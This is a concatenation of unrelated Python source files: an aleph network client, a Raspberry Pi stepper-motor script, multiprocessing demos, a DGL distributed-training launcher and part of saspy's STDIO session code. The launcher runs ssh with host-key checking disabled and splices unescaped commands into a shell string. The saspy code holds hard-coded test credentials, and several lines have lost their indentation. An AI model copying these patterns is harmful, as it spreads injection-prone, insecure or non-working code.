        #     "comment": "Working data persisted on the VM supervisor, not available on other nodes",
        #     "mount": "/var/lib/sqlite",
        #     "name": "database",
        #     "persistence": "host",
        #     "size_mib": 5
        # }
        "time": time.time(),
    })
    # exclude_none keeps the serialized content minimal.
    return await submit(
        account=account,
        content=content.dict(exclude_none=True),
        message_type="PROGRAM",
        channel=channel,
        api_server=api_server,
        storage_engine=storage_engine,
        session=session,
        inline=True,
    )
def sync_create_program(
    account: Account,
    program_ref: str,
    entrypoint: str,
    runtime: str,
    storage_engine: StorageEnum = StorageEnum.storage,
    channel: str = "TEST",
    address: Optional[str] = settings.ADDRESS_TO_USE,
    session: Optional[ClientSession] = None,
    api_server: str = settings.API_HOST,
    memory: int = settings.DEFAULT_VM_MEMORY,
    encoding: Encoding = Encoding.zip,
    volumes: List[Dict] = None,
    subscriptions: Optional[List[Dict]] = None,
):
    """Blocking wrapper around create_program (same parameters)."""
    call_kwargs = dict(
        account=account,
        program_ref=program_ref,
        entrypoint=entrypoint,
        runtime=runtime,
        storage_engine=storage_engine,
        channel=channel,
        address=address,
        session=session,
        api_server=api_server,
        memory=memory,
        encoding=encoding,
        volumes=volumes,
        subscriptions=subscriptions,
    )
    return wrap_async(create_program)(**call_kwargs)
async def submit(
    account: Account,
    content: dict,
    message_type: str,
    channel: str = "IOT_TEST",
    api_server: str = settings.API_HOST,
    storage_engine: str = "storage",
    session: Optional[ClientSession] = None,
    inline: bool = True,
):
    """Assemble, sign and broadcast an aleph message carrying *content*.

    Small content (< 50000 chars serialized) is inlined and hashed with
    SHA-256; larger content is pushed to the selected storage engine and
    referenced by its hash.
    """
    message: Dict[str, Any] = {
        "chain": account.CHAIN,
        "channel": channel,
        "sender": account.get_address(),
        "type": message_type,
        "time": time.time(),
    }
    # Compact separators keep the serialized form (and thus the hash) canonical.
    item_content: str = json.dumps(content, separators=(",", ":"))
    if inline and len(item_content) < 50000:
        message["item_content"] = item_content
        message["item_hash"] = hashlib.sha256(item_content.encode("utf-8")).hexdigest()
    elif storage_engine == "ipfs":
        message["item_hash"] = await ipfs_push(content, api_server=api_server)
    else:  # storage
        message["item_hash"] = await storage_push(content, api_server=api_server)
    message = await account.sign_message(message)
    await broadcast(message, session=session, api_server=api_server)
    # let's add the content to the object so users can access it.
    message["content"] = content
    return message
sync_submit = wrap_async(submit)
async def fetch_aggregate(
    address: str,
    key,
    session: Optional[ClientSession] = None,
    api_server: str = settings.API_HOST,
):
    """Fetch one aggregate value for *address* by *key*."""
    session = session or get_fallback_session()
    url = f"{api_server}/api/v0/aggregates/{address}.json?keys={key}"
    async with session.get(url) as resp:
        data = (await resp.json()).get("data", {})
    return data.get(key)
sync_fetch_aggregate = wrap_async(fetch_aggregate)
async def fetch_aggregates(
    address: str,
    keys: Optional[Iterable[str]] = None,
    session: Optional[ClientSession] = None,
    api_server: str = settings.API_HOST,
) -> Dict[str, Dict]:
    """Fetch all (or the selected) aggregates for *address* as a dict."""
    session = session or get_fallback_session()
    query_string = ""
    if keys:
        query_string = "?keys=" + ",".join(keys)
    url = f"{api_server}/api/v0/aggregates/{address}.json{query_string}"
    async with session.get(url) as resp:
        return (await resp.json()).get("data", {})
sync_fetch_aggregates = wrap_async(fetch_aggregates)
async def get_posts(
    pagination: int = 200,
    page: int = 1,
    types: Optional[Iterable[str]] = None,
    refs: Optional[Iterable[str]] = None,
    addresses: Optional[Iterable[str]] = None,
    tags: Optional[Iterable[str]] = None,
    hashes: Optional[Iterable[str]] = None,
    channels: Optional[Iterable[str]] = None,
    start_date: Optional[Union[datetime, float]] = None,
    end_date: Optional[Union[datetime, float]] = None,
    session: Optional[ClientSession] = None,
    api_server: str = settings.API_HOST,
):
    """Query the posts endpoint with the given filters.

    Iterable filters become comma-joined query parameters; datetimes are
    converted to POSIX timestamps. Returns the decoded JSON response.
    """
    session = session or get_fallback_session()
    params: Dict[str, Any] = dict(pagination=pagination, page=page)
    if types is not None:
        params["types"] = ",".join(types)
    if refs is not None:
        params["refs"] = ",".join(refs)
    if addresses is not None:
        params["addresses"] = ",".join(addresses)
    if tags is not None:
        params["tags"] = ",".join(tags)
    if hashes is not None:
        params["hashes"] = ",".join(hashes)
    if channels is not None:
        params["channels"] = ",".join(channels)
    if start_date is not None:
        if not isinstance(start_date, float) and hasattr(start_date, "timestamp"):
            start_date = start_date.timestamp()
        params["start_date"] = start_date
    if end_date is not None:
        # BUG FIX: the original probed hasattr(start_date, "timestamp")
        # here, so an end_date datetime was never converted when
        # start_date was absent.
        if not isinstance(end_date, float) and hasattr(end_date, "timestamp"):
            end_date = end_date.timestamp()
        params["end_date"] = end_date
    async with session.get(f"{api_server}/api/v0/posts.json", params=params) as resp:
        resp.raise_for_status()
        return await resp.json()
sync_get_posts = wrap_async(get_posts)
async def get_messages(
    pagination: int = 200,
    page: int = 1,
    message_type: Optional[str] = None,
    content_types: Optional[Iterable[str]] = None,
    refs: Optional[Iterable[str]] = None,
    addresses: Optional[Iterable[str]] = None,
    tags: Optional[Iterable[str]] = None,
    hashes: Optional[Iterable[str]] = None,
    channels: Optional[Iterable[str]] = None,
    start_date: Optional[Union[datetime, float]] = None,
    end_date: Optional[Union[datetime, float]] = None,
    session: Optional[ClientSession] = None,
    api_server: str = settings.API_HOST,
) -> Dict[str, Any]:
    """Query the messages endpoint with the given filters.

    Iterable filters become comma-joined query parameters; datetimes are
    converted to POSIX timestamps. Returns the decoded JSON response.
    """
    session = session or get_fallback_session()
    params: Dict[str, Any] = dict(pagination=pagination, page=page)
    if message_type is not None:
        params["msgType"] = message_type
    if content_types is not None:
        params["contentTypes"] = ",".join(content_types)
    if refs is not None:
        params["refs"] = ",".join(refs)
    if addresses is not None:
        params["addresses"] = ",".join(addresses)
    if tags is not None:
        params["tags"] = ",".join(tags)
    if hashes is not None:
        params["hashes"] = ",".join(hashes)
    if channels is not None:
        params["channels"] = ",".join(channels)
    if start_date is not None:
        if not isinstance(start_date, float) and hasattr(start_date, "timestamp"):
            start_date = start_date.timestamp()
        params["start_date"] = start_date
    if end_date is not None:
        # BUG FIX: the original probed hasattr(start_date, "timestamp")
        # here — end_date datetimes were never converted when start_date
        # was absent.
        if not isinstance(end_date, float) and hasattr(end_date, "timestamp"):
            end_date = end_date.timestamp()
        params["end_date"] = end_date
    async with session.get(f"{api_server}/api/v0/messages.json", params=params) as resp:
        resp.raise_for_status()
        return await resp.json()
sync_get_messages = wrap_async(get_messages)
async def watch_messages(
    pagination: int = 200,
    page: int = 1,
    message_type: Optional[str] = None,
    content_types: Optional[Iterable[str]] = None,
    refs: Optional[Iterable[str]] = None,
    addresses: Optional[Iterable[str]] = None,
    tags: Optional[Iterable[str]] = None,
    hashes: Optional[Iterable[str]] = None,
    channels: Optional[Iterable[str]] = None,
    start_date: Optional[Union[datetime, float]] = None,
    end_date: Optional[Union[datetime, float]] = None,
    session: Optional[ClientSession] = None,
    api_server: str = settings.API_HOST,
) -> AsyncIterable[Dict[str, Any]]:
    """
    Iterate over current and future matching messages asynchronously.

    Yields each decoded message dict from the websocket stream until the
    server sends 'close cmd' or the socket errors out.
    """
    session = session or get_fallback_session()
    params: Dict[str, Any] = dict(pagination=pagination, page=page)
    if message_type is not None:
        params["msgType"] = message_type
    if content_types is not None:
        params["contentTypes"] = ",".join(content_types)
    if refs is not None:
        params["refs"] = ",".join(refs)
    if addresses is not None:
        params["addresses"] = ",".join(addresses)
    if tags is not None:
        params["tags"] = ",".join(tags)
    if hashes is not None:
        params["hashes"] = ",".join(hashes)
    if channels is not None:
        params["channels"] = ",".join(channels)
    if start_date is not None:
        if not isinstance(start_date, float) and hasattr(start_date, "timestamp"):
            start_date = start_date.timestamp()
        params["start_date"] = start_date
    if end_date is not None:
        # BUG FIX: the original probed hasattr(start_date, "timestamp")
        # here — end_date datetimes were never converted when start_date
        # was absent.
        if not isinstance(end_date, float) and hasattr(end_date, "timestamp"):
            end_date = end_date.timestamp()
        params["end_date"] = end_date
    # FIXME:
    # We build the URL manually since aiohttp.ClientSession.ws_connect does not support
    # the `params` argument at the moment.
    # Upstream issue: https://github.com/aio-libs/aiohttp/issues/5868
    # Upstream pull request: https://github.com/aio-libs/aiohttp/pull/5869
    url = URL(f"{api_server}/api/ws0/messages").with_query(params)
    async with session.ws_connect(url) as ws:
        logger.debug("Websocket connected")
        async for msg in ws:
            if msg.type == aiohttp.WSMsgType.TEXT:
                if msg.data == 'close cmd':
                    await ws.close()
                    break
                else:
                    yield json.loads(msg.data)
            elif msg.type == aiohttp.WSMsgType.ERROR:
                break
async def _run_watch_messages(coroutine: AsyncIterable, output_queue: queue.Queue):
"""Forward messages from the coroutine to the synchronous queue"""
async for message in coroutine:
output_queue.put(message)
def _start_run_watch_messages(output_queue: queue.Queue, args: List, kwargs: Dict):
    """Thread entry point: run the `watch_messages` asynchronous generator.

    output_queue -- queue the forwarded messages are pushed onto
    args, kwargs -- positional/keyword arguments forwarded to `watch_messages`

    Uses ``asyncio.run`` so the per-thread event loop is properly created,
    installed as the thread's current loop, and closed when the stream ends
    — the previous ``new_event_loop().run_until_complete(...)`` call never
    closed the loop, leaking its resources for the life of the thread.
    """
    watcher = watch_messages(*args, **kwargs)
    asyncio.run(_run_watch_messages(watcher, output_queue))
def sync_watch_messages(*args, **kwargs):
    """
    Iterate over current and future matching messages synchronously.

    Spawns a worker thread that drives the `watch_messages` asynchronous
    generator; each message is handed over through a queue and yielded to
    the caller. The iteration never terminates on its own.
    """
    messages = queue.Queue()
    worker = threading.Thread(
        target=_start_run_watch_messages,
        args=(messages, args, kwargs),
    )
    worker.start()
    # Fresh object() is a sentinel no producer can ever emit, so this
    # blocks on the queue and yields forever — same as `while True`.
    never = object()
    yield from iter(messages.get, never)
|
threading_example.py | import RPi.GPIO as GPIO
from time import sleep
from mpu6050 import mpu6050
from threading import Thread
# Sensor variables.
# NOTE(review): `global` at module level is a no-op — names assigned at the
# top of a module are already global. These three statements have no effect.
global x
global y
global sensor
# MPU-6050 accelerometer at its default I2C address 0x68.
sensor = mpu6050(0x68)
# Direction pin from controller
DIR1 = 37
DIR2 = 29
# Step pin from controller
STEP1 = 35
STEP2 = 21
# 0/1 used to signify clockwise or counterclockwise.
# NOTE(review): CW and CCW are BOTH 1, so the two directions are
# indistinguishable — one of them was presumably meant to be 0; confirm
# the intended mapping against the motor wiring before changing.
CW =1
CCW = 1
# Setup pin layout on PI.
# NOTE(review): BCM numbering is selected, but pins 37/35/29 exceed the BCM
# range (0-27) and look like physical BOARD numbers — verify GPIO.BOARD
# wasn't intended.
GPIO.setmode(GPIO.BCM)
# Establish Pins in software
GPIO.setup(DIR1, GPIO.OUT)
GPIO.setup(STEP1, GPIO.OUT)
GPIO.setup(DIR2, GPIO.OUT)
GPIO.setup(STEP2, GPIO.OUT)
# move function for the stepper motors
def move(step_pin, dir_pin, direction, speed, distance):
    """Pulse a stepper driver `distance` steps in the given direction.

    step_pin  -- GPIO pin wired to the driver's STEP input
    dir_pin   -- GPIO pin wired to the driver's DIR input
    direction -- logic level written to dir_pin (CW/CCW constant)
    speed     -- seconds to hold each half of the step pulse; smaller
                 values make the motor run faster
    distance  -- number of step pulses to emit (step count per revolution
                 depends on how the controller is configured)
    """
    # The needless `global GPIO` declaration was removed: the function only
    # reads the module-level name, which requires no global statement.
    # Establish the direction you want to go.
    GPIO.output(dir_pin, direction)
    for _ in range(distance):
        # One full step = a high half-pulse followed by a low half-pulse.
        GPIO.output(step_pin, GPIO.HIGH)
        sleep(speed)
        GPIO.output(step_pin, GPIO.LOW)
        sleep(speed)
# set the duration
#
# def get_mpu_data():
#
# global x
# global y
# global sensor
#
# while True:
# accelerometer_data = sensor.get_accel_data()
# x = accelerometer_data['x']
# y = accelerometer_data['y']
#
#
# data = Thread(target=get_mpu_data)
# #Start Thread
# data.start()
# Main loop: sweep the X-axis motor continuously until Ctrl-C, then release
# the GPIO pins. The tilt-correction loop below is intentionally disabled.
try:
    while True:
        print("Move x")
        move(STEP1, DIR1, CCW, 0.1, 2000)
        sleep(1)
    # # Run forever
    # while True:
    #     if (x > 3):
    #         move(STEP1, DIR1, CCW, 0.005, 500)
    #     if (x < -3):
    #         move(STEP1, DIR1, CW, 0.005, 500)
    #     if (y > 3):
    #         move(STEP2, DIR2, CCW, 0.005, 500)
    #     if (y < -3):
    #         move(STEP2, DIR2, CW, 0.005, 500)
    #
# Once finished clean everything up
except KeyboardInterrupt:
    print("cleanup")
finally:
    # Always release the pins, even on an unexpected error.
    GPIO.cleanup()
|
multiprocessingTest.py | from multiprocessing import Process, Value
import os, time, random
# Code executed by the writer child process:
def write(q):
    """Report the shared value, set it to 8, then poll until it becomes 10.

    q -- a multiprocessing.Value('i', ...) shared with the parent; this
    function returns only once some other process sets it to 10.
    """
    def report():
        print('Process to write: %s' % q.value)

    report()
    q.value = 8
    report()
    # Poll every five seconds until the parent signals us to stop.
    while q.value != 10:
        time.sleep(5)
        report()
def runParentProcess():
    """Spawn the writer child, let it run for 30 s, then signal it to stop."""
    shared = Value("i", 5)
    writer = Process(target=write, args=(shared,))
    # Start the child process; it begins writing immediately.
    writer.start()
    # Give the child time to run, then set the stop value it polls for.
    time.sleep(30)
    shared.value = 10
    writer.join()
    # A child stuck in an infinite loop could not be joined like this;
    # it would have to be terminate()d instead.
# Script entry point. The guard is required so multiprocessing's 'spawn'
# start method does not re-run this when the module is imported in a child.
if __name__=='__main__':
    runParentProcess()
|
launch.py | """Launching tool for DGL distributed training"""
import os
import stat
import sys
import subprocess
import argparse
import signal
import logging
import time
from threading import Thread
def execute_remote(cmd, ip, thread_list):
    """execute command line on remote machine via ssh

    cmd         -- shell command to run on the remote host
    ip          -- remote host (anything ssh accepts as a destination)
    thread_list -- list the started worker thread is appended to, so the
                   caller can join on all submitted jobs later

    NOTE(review): `cmd` is interpolated into a shell string unescaped —
    callers must only pass trusted input.
    """
    cmd = 'ssh -o StrictHostKeyChecking=no ' + ip + ' \'' + cmd + '\''
    # thread func to run the job
    def run(cmd):
        subprocess.check_call(cmd, shell = True)
    thread = Thread(target = run, args=(cmd,))
    # FIX: Thread.setDaemon() is deprecated (since Python 3.10); assigning
    # the `daemon` attribute is the supported, behaviorally identical form.
    thread.daemon = True
    thread.start()
    thread_list.append(thread)
def submit_jobs(args, udf_command):
    """Submit distributed jobs (server and client processes) via ssh.

    args        -- parsed launcher arguments (workspace, num_client,
                   conf_path, ip_config)
    udf_command -- the user's training command line; its 'python3' token is
                   rewritten to insert torch.distributed.launch
    Blocks until every remote ssh worker thread finishes.
    """
    hosts = []
    thread_list = []
    server_count_per_machine = 0
    # ip_config lists one machine per line: "<ip> <port> <server_count>".
    ip_config = args.workspace + '/' + args.ip_config
    with open(ip_config) as f:
        for line in f:
            ip, port, count = line.strip().split(' ')
            port = int(port)
            count = int(count)
            # NOTE(review): only the last line's count is kept — this
            # assumes every machine runs the same number of servers.
            server_count_per_machine = count
            hosts.append((ip, port))
    # Clients must divide evenly across the machines.
    assert args.num_client % len(hosts) == 0
    client_count_per_machine = int(args.num_client / len(hosts))
    # launch server tasks: one DGL server process per (machine, server id)
    server_cmd = 'DGL_ROLE=server'
    server_cmd = server_cmd + ' ' + 'DGL_NUM_CLIENT=' + str(args.num_client)
    server_cmd = server_cmd + ' ' + 'DGL_CONF_PATH=' + str(args.conf_path)
    server_cmd = server_cmd + ' ' + 'DGL_IP_CONFIG=' + str(args.ip_config)
    for i in range(len(hosts)*server_count_per_machine):
        ip, _ = hosts[int(i / server_count_per_machine)]
        cmd = server_cmd + ' ' + 'DGL_SERVER_ID=' + str(i)
        cmd = cmd + ' ' + udf_command
        cmd = 'cd ' + str(args.workspace) + '; ' + cmd
        execute_remote(cmd, ip, thread_list)
    # launch client tasks through torch.distributed.launch, one rank per host
    client_cmd = 'DGL_DIST_MODE="distributed" DGL_ROLE=client'
    client_cmd = client_cmd + ' ' + 'DGL_NUM_CLIENT=' + str(args.num_client)
    client_cmd = client_cmd + ' ' + 'DGL_CONF_PATH=' + str(args.conf_path)
    client_cmd = client_cmd + ' ' + 'DGL_IP_CONFIG=' + str(args.ip_config)
    # Propagate relevant environment variables into the remote shells.
    if os.environ.get('OMP_NUM_THREADS') is not None:
        client_cmd = client_cmd + ' ' + 'OMP_NUM_THREADS=' + os.environ.get('OMP_NUM_THREADS')
    if os.environ.get('PYTHONPATH') is not None:
        client_cmd = client_cmd + ' ' + 'PYTHONPATH=' + os.environ.get('PYTHONPATH')
    torch_cmd = '-m torch.distributed.launch'
    torch_cmd = torch_cmd + ' ' + '--nproc_per_node=' + str(client_count_per_machine)
    torch_cmd = torch_cmd + ' ' + '--nnodes=' + str(len(hosts))
    torch_cmd = torch_cmd + ' ' + '--node_rank=' + str(0)
    torch_cmd = torch_cmd + ' ' + '--master_addr=' + str(hosts[0][0])
    # NOTE(review): master port is hard-coded to 1234 — confirm it is free.
    torch_cmd = torch_cmd + ' ' + '--master_port=' + str(1234)
    for node_id, host in enumerate(hosts):
        ip, _ = host
        # Patch the per-node rank into the otherwise shared torch command.
        new_torch_cmd = torch_cmd.replace('node_rank=0', 'node_rank='+str(node_id))
        new_udf_command = udf_command.replace('python3', 'python3 ' + new_torch_cmd)
        cmd = client_cmd + ' ' + new_udf_command
        cmd = 'cd ' + str(args.workspace) + '; ' + cmd
        execute_remote(cmd, ip, thread_list)
    # Wait for every remote job's ssh worker thread.
    for thread in thread_list:
        thread.join()
def main():
    """Parse launcher arguments and submit the distributed job.

    Everything argparse does not recognise is treated as the user's
    training command line (exactly one token expected).
    """
    parser = argparse.ArgumentParser(description='Launch a distributed job')
    parser.add_argument('--workspace', type=str,
                        help='Path of user directory of distributed tasks. \
This is used to specify a destination location where \
the contents of current directory will be rsyncd')
    parser.add_argument('--num_client', type=int,
                        help='Total number of client processes in the cluster')
    parser.add_argument('--conf_path', type=str,
                        help='The path to the partition config file. This path can be \
a remote path like s3 and dgl will download this file automatically')
    parser.add_argument('--ip_config', type=str,
                        help='The file for IP configuration for server processes')
    args, udf_command = parser.parse_known_args()
    assert len(udf_command) == 1, 'Please provide user command line.'
    assert args.num_client > 0, '--num_client must be a positive number.'
    udf_command = str(udf_command[0])
    # The launcher rewrites the 'python3' token, so the command must be python.
    if 'python' not in udf_command:
        raise RuntimeError("DGL launch can only support: python ...")
    submit_jobs(args, udf_command)
def signal_handler(signal, frame):
    """SIGINT handler: log the shutdown and terminate the launcher."""
    logging.info('Stop launcher')
    # Equivalent to sys.exit(0): raises SystemExit with exit code 0.
    raise SystemExit(0)
# Script entry point: configure logging, trap Ctrl-C, then launch the job.
if __name__ == '__main__':
    fmt = '%(asctime)s %(levelname)s %(message)s'
    logging.basicConfig(format=fmt, level=logging.INFO)
    signal.signal(signal.SIGINT, signal_handler)
    main()
|
q11_multiprocessing.py | import multiprocessing
import time
# Method executed by each child process
def foo(n):
    """Child-process body: pause two seconds, then echo the argument."""
    delay_seconds = 2
    time.sleep(delay_seconds)
    print(n)
# Spawn 10 child processes in a loop.
# NOTE(review): there is no `if __name__ == '__main__':` guard; under the
# 'spawn' start method (e.g. Windows) this module-level loop would re-run
# in every child — confirm this script only targets fork-based platforms.
for i in range(10):
    print('i ===>', i)
    # Create the child-process instance.
    p = multiprocessing.Process(target=foo, args=('person: %s' % i,))
    # Run the child process.
    p.start()
sasiostdio.py | #
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
if os.name != 'nt':
import fcntl
import signal
import subprocess
import tempfile as tf
from time import sleep
import socket as socks
import codecs
import select as sel
import warnings
try:
import pandas as pd
import numpy as np
except ImportError:
pass
if os.name == 'nt':
from queue import Queue, Empty
from threading import Thread
class SASconfigSTDIO:
    """
    This object is not intended to be used directly. Instantiate a SASsession object instead.

    Resolves the STDIO connection settings for a session: values come from
    the named configuration in sascfg_personal.py, optionally overridden by
    keyword arguments — unless the config sets lock_down, in which case
    runtime overrides of file-supplied values are refused with a message.
    """
    def __init__(self, session, **kwargs):
        # session -- the owning SASsessionSTDIO instance
        # kwargs  -- per-session overrides (honored only when not locked down)
        self._kernel = kwargs.get('kernel', None)
        # Named configuration block from the sascfg module.
        SAScfg = session._sb.sascfg.SAScfg
        self.name = session._sb.sascfg.name
        cfg = getattr(SAScfg, self.name)
        # Raw values from the config file; kwargs may override them below.
        self.saspath = cfg.get('saspath', '')
        self.options = cfg.get('options', [])
        self.ssh = cfg.get('ssh', '')
        self.identity = cfg.get('identity', None)
        self.luser = cfg.get('luser', None)
        self.tunnel = cfg.get('tunnel', None)
        self.rtunnel = cfg.get('rtunnel', None)
        self.port = cfg.get('port', None)
        self.host = cfg.get('host', '')
        self.encoding = cfg.get('encoding', '')
        self.metapw = cfg.get('metapw', '')
        self.lrecl = cfg.get('lrecl', None)
        self.iomc = cfg.get('iomc', '')
        # Output format: html5 unless SAS_output_options says otherwise.
        try:
            self.outopts = getattr(SAScfg, "SAS_output_options")
            self.output = self.outopts.get('output', 'html5')
        except:
            self.output = 'html5'
        if self.output.lower() not in ['html', 'html5']:
            print("Invalid value specified for SAS_output_options. Using the default of HTML5")
            self.output = 'html5'
        # GET Config options
        try:
            self.cfgopts = getattr(SAScfg, "SAS_config_options")
        except:
            self.cfgopts = {}
        lock = self.cfgopts.get('lock_down', True)
        # in lock down mode, don't allow runtime overrides of option values from the config file.
        self.verbose = self.cfgopts.get('verbose', True)
        self.verbose = kwargs.get('verbose', self.verbose)
        # Each stanza below applies one kwarg override, refusing it (with a
        # message) when lock_down is set AND the config file supplied a value.
        insaspath = kwargs.get('saspath', '')
        if len(insaspath) > 0:
            if lock and len(self.saspath):
                print("Parameter 'saspath' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.saspath = insaspath
        inoptions = kwargs.get('options', '')
        if len(inoptions) > 0:
            if lock and len(self.options):
                print("Parameter 'options' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.options = inoptions
        inssh = kwargs.get('ssh', '')
        if len(inssh) > 0:
            if lock and len(self.ssh):
                print("Parameter 'ssh' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.ssh = inssh
        inident = kwargs.get('identity', None)
        if inident is not None:
            if lock:
                print("Parameter 'identity' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.identity = inident
        inluser = kwargs.get('luser', None)
        if inluser is not None:
            if lock:
                print("Parameter 'luser' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.luser = inluser
        intunnel = kwargs.get('tunnel', None)
        if intunnel is not None:
            if lock:
                print("Parameter 'tunnel' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.tunnel = intunnel
        inrtunnel = kwargs.get('rtunnel', None)
        if inrtunnel is not None:
            if lock:
                print("Parameter 'rtunnel' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.rtunnel = inrtunnel
        inport = kwargs.get('port', None)
        if inport is not None:
            if lock:
                print("Parameter 'port' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.port = inport
        inhost = kwargs.get('host', '')
        if len(inhost) > 0:
            if lock and len(self.host):
                print("Parameter 'host' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.host = inhost
        inencoding = kwargs.get('encoding', 'NoOverride')
        if inencoding !='NoOverride':
            if lock and len(self.encoding):
                print("Parameter 'encoding' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.encoding = inencoding
        if not self.encoding:
            self.encoding = '' # 'utf-8'
        if self.encoding != '':
            # Validate the configured encoding; the lookup result itself is
            # unused — only success/failure matters here.
            try:
                coinfo = codecs.lookup(self.encoding)
            except LookupError:
                print("The encoding provided ("+self.encoding+") doesn't exist in this Python session. Setting it to ''.")
                print("The correct encoding will attempt to be determined based upon the SAS session encoding.")
                self.encoding = ''
        inlrecl = kwargs.get('lrecl', None)
        if inlrecl:
            if lock and self.lrecl:
                print("Parameter 'lrecl' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.lrecl = inlrecl
        if not self.lrecl:
            self.lrecl = 1048576
        self._prompt = session._sb.sascfg._prompt
        # Best-effort resolution of this host's IP via nslookup, so SAS-side
        # code can connect back; falls back to the hostname on any failure.
        self.hostip = socks.gethostname()
        try:
            x = subprocess.Popen(('nslookup', self.hostip), stdout=subprocess.PIPE)
            z = x.stdout.read()
            ip = z.rpartition(b'Address:')[2].strip().decode()
            try:
                # Keep the IP only if it reverse-resolves.
                socks.gethostbyaddr(ip)
                self.hostip = ip
            except:
                pass
            x.terminate()
        except:
            pass
        return
class SASsessionSTDIO():
"""
The SASsession object is the main object to instantiate and provides access to the rest of the functionality.
cfgname - value in SAS_config_names List of the sascfg_personal.py file
kernel - None - internal use when running the SAS_kernel notebook
saspath - overrides saspath Dict entry of cfgname in sascfg_personal.py file
options - overrides options Dict entry of cfgname in sascfg_personal.py file
encoding - This is the python encoding value that matches the SAS session encoding of the IOM server you are connecting to
autoexec - This is a string of SAS code that will be submitted upon establishing a connection.
ssh - full path of the ssh command; /usr/bin/ssh for instance
host - host name of the remote machine
identity - path to an .ppk identity file to be used with the ssh -i option
port - (Optional: integer) The ssh port of the remote machine (equivalent to invoking ssh with the -p option)
tunnel - (Optional: integer) Certain methods of saspy require opening a local port and accepting data streamed from the SAS instance.
"""
#def __init__(self, cfgname: str ='', kernel: '<SAS_kernel object>' =None, saspath :str ='', options: list =[]) -> '<SASsession object>':
    def __init__(self, **kwargs):
        """Create the session config and start the SAS subprocess."""
        # Subprocess handle: Popen object on Windows, bare pid int on POSIX.
        self.pid = None
        # Pipes to/from the SAS process (file objects or Queues on Windows).
        self.stdin = None
        self.stderr = None
        self.stdout = None
        # The owning SASsession wrapper object.
        self._sb = kwargs.get('sb', None)
        # Monotonic counter used to build unique log-delimiter markers.
        self._log_cnt = 0
        self._log = ""
        self.sascfg = SASconfigSTDIO(self, **kwargs)
        self._startsas()
        return
    def __del__(self):
        # Best-effort shutdown of the SAS subprocess at garbage collection.
        if self.pid:
            self._endsas()
        # Cleared unconditionally, even when no process was attached.
        self._sb.SASpid = None
def _logcnt(self, next=True):
if next == True:
self._log_cnt += 1
return '%08d' % self._log_cnt
    def _buildcommand(self, sascfg):
        """Build [pgm, parms]: the executable and argv list used to start SAS.

        Remote (ssh) sessions wrap the SAS invocation in an ssh command with
        the configured identity/port/tunnel options; local sessions run
        saspath directly with the standard STDIO options.
        """
        if sascfg.ssh:
            pgm = sascfg.ssh
            parms = [pgm]
            parms += ["-t"]
            if sascfg.identity:
                parms += ["-i", sascfg.identity]
            if sascfg.port:
                parms += ["-p", str(sascfg.port)]
            if sascfg.tunnel:
                # ssh -R: remote (reverse) port forward back to this machine.
                parms += ["-R", '%d:localhost:%d' % (sascfg.tunnel,sascfg.tunnel)]
            if sascfg.rtunnel:
                # ssh -L: local port forward toward the remote machine.
                parms += ["-L", '%d:localhost:%d' % (sascfg.rtunnel,sascfg.rtunnel)]
            if sascfg.luser:
                parms += [sascfg.luser+'@'+sascfg.host, sascfg.saspath]
            else:
                parms += [sascfg.host, sascfg.saspath]
            if sascfg.output.lower() == 'html':
                print("""HTML4 is only valid in 'local' mode (SAS_output_options in sascfg_personal.py).
Please see SAS_config_names templates 'default' (STDIO) or 'winlocal' (IOM) in the sample sascfg.py.
Will use HTML5 for this SASsession.""")
                sascfg.output = 'html5'
        else:
            pgm = sascfg.saspath
            parms = [pgm]
        # temporary hack for testing grid w/ sasgsub and iomc ...
        if sascfg.iomc:
            pgm = sascfg.iomc
            parms = [pgm]
            parms += ["user", "sas", "pw", "sas"]
            parms += ['']
        elif sascfg.metapw:
            pgm = sascfg.ssh
            parms = [pgm]
            parms += ["-t", "-i", "/u/sastpw/idrsacnn", sascfg.host]
            parms += sascfg.options
            #parms += ['"'+sascfg.saspath+' -nodms -stdio -terminal -nosyntaxcheck -pagesize MAX"']
            parms += ['']
        else:
            # Standard STDIO invocation options.
            parms += sascfg.options
            parms += ["-nodms"]
            parms += ["-stdio"]
            parms += ["-terminal"]
            parms += ["-nosyntaxcheck"]
            parms += ["-pagesize", "MAX"]
            parms += ['']
        return [pgm, parms]
    def _startsas(self):
        """Start the SAS subprocess and verify the connection.

        Returns the process handle (Popen on Windows, pid int on POSIX) or
        None when the connection could not be established.
        """
        if self.pid:
            # Already connected; idempotent.
            return self.pid
        pgm, parms = self._buildcommand(self.sascfg)
        # Printable form of the full command, used in error messages.
        s = ''
        for i in range(len(parms)):
            s += parms[i]+' '
        if os.name == 'nt':
            try:
                self.pid = subprocess.Popen(parms, bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                pid = self.pid.pid
            except OSError as e:
                print("The OS Error was:\n"+e.strerror+'\n')
                print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
                print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
                print("If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n")
                return None
        else:
            PIPE_READ = 0
            PIPE_WRITE = 1
            # Three explicit pipes carry the child's stdin/stdout/stderr; the
            # pty from forkpty gives SAS a controlling terminal.
            pin = os.pipe()
            pout = os.pipe()
            perr = os.pipe()
            try:
                pidpty = os.forkpty()
            except:
                import pty
                pidpty = pty.fork()
            if pidpty[0]:
                # we are the parent
                pid = pidpty[0]
                # Close the pipe ends the parent does not use.
                os.close(pin[PIPE_READ])
                os.close(pout[PIPE_WRITE])
                os.close(perr[PIPE_WRITE])
            else:
                # we are the child
